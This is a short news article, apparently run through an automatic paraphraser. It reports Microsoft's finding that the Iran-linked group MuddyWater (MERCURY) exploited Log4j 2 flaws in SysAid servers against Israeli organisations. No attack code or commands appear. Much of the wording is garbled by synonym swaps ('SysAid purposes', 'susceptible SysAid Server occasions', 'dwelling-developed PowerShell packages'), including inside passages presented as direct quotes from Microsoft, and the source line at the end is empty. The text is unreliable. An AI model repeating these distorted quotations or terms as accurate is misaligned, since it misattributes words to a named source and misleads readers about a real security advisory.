Iran-based mostly threat actor MuddyWater (tracked by Microsoft as MERCURY) has been leveraging the exploitation of Log4j 2 vulnerabilities in SysAid purposes to concentrate on organizations in Israel.
The information arrives from a new advisory from Microsoft’s security researchers, who said on Thursday they could assess with higher confidence that MERCURY’s observed exercise was affiliated with Iran’s Ministry of Intelligence and Security (MOIS).
“On July 23 and 25, 2022, MERCURY was observed applying exploits in opposition to susceptible SysAid Server occasions as its preliminary accessibility vector,” Microsoft wrote. “Based on observations from previous strategies and vulnerabilities uncovered in goal environments, [we] evaluate that the exploits employed were being most most likely associated to Log4j 2.”
In reality, the novel marketing campaign noticed by the Microsoft Risk Intelligence Centre (MSTIC) and Microsoft 365 Defender Analysis Team differs from prior MERCURY kinds as it is the initially a person in which the group exploits SysAid apps as a vector for preliminary obtain.
“Following attaining accessibility, MERCURY establishes persistence, dumps credentials, and moves laterally inside of the specific corporation using both equally customized and perfectly-known hacking equipment, as well as constructed-in functioning technique applications for its hands-on-keyboard attack,” reads the advisory.
Microsoft also involved a checklist of prevalent procedures and tooling employed by MERCURY, which involve spearphishing, along with systems these types of as the Venom proxy resource, the Ligolo reverse tunneling technique and dwelling-developed PowerShell packages.
Microsoft confirmed it notified consumers that have been specific or compromised, supplying them with the information and facts desired to protected their accounts. The enterprise has also supplied a list of indicators of compromise (IOCs) linked to MERCURY’s action.
“We stimulate our customers to look into these indicators in their environments and put into practice detections and protections to recognize previous connected exercise and stop upcoming attacks towards their methods.”
Microsoft is not the very first entity associating MERCURY with Iranian point out actors. Before this year, both of those U.K. and U.S. governments issued warnings connecting the team with the state’s MOIS.
Some areas of this short article are sourced from: